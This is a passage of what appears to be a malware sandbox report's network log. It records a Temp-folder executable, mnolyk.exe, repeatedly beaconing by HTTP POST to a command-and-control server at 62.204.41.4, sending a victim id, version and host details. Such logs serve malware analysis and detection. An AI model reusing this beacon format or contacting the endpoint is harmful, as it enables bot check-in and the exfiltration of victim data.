                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:09.275585890 CET503INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        303192.168.2.54999362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:09.446811914 CET504OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:09.510627985 CET504INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        304192.168.2.54999462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:09.678155899 CET505OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:09.741938114 CET505INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        305192.168.2.54999562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:09.929475069 CET506OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:09.995454073 CET506INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        306192.168.2.54999662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:10.162120104 CET507OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:10.226402044 CET507INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        307192.168.2.54999762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:10.399966002 CET508OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:10.464658976 CET508INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        308192.168.2.54999862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:10.629964113 CET509OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:10.693331003 CET509INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        309192.168.2.54999962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:11.060496092 CET510OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:11.126276970 CET510INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        31192.168.2.54972162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:39.081762075 CET231OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:39.150372028 CET232INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        310192.168.2.55000062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:11.377142906 CET511OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:11.442153931 CET511INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        311192.168.2.55000162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:11.711180925 CET512OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:11.775501966 CET512INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        312192.168.2.55000262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:12.405675888 CET513OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:12.469245911 CET513INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        313192.168.2.55000362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:13.453553915 CET514OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:13.520159006 CET514INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        314192.168.2.55000462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:13.908823967 CET515OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:13.973970890 CET515INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        315192.168.2.55000562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:14.255721092 CET516OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:14.322971106 CET516INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        316192.168.2.55000662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:14.489864111 CET517OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:14.553904057 CET517INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        317192.168.2.55000762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:14.733546972 CET518OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:14.796650887 CET518INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        318192.168.2.55000862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:14.977536917 CET519OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:15.043209076 CET519INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        319192.168.2.55000962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:15.225596905 CET520OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:15.291661024 CET520INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        32192.168.2.54972262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:39.327483892 CET232OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:39.392071009 CET233INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        320192.168.2.55001062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:15.475260019 CET521OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
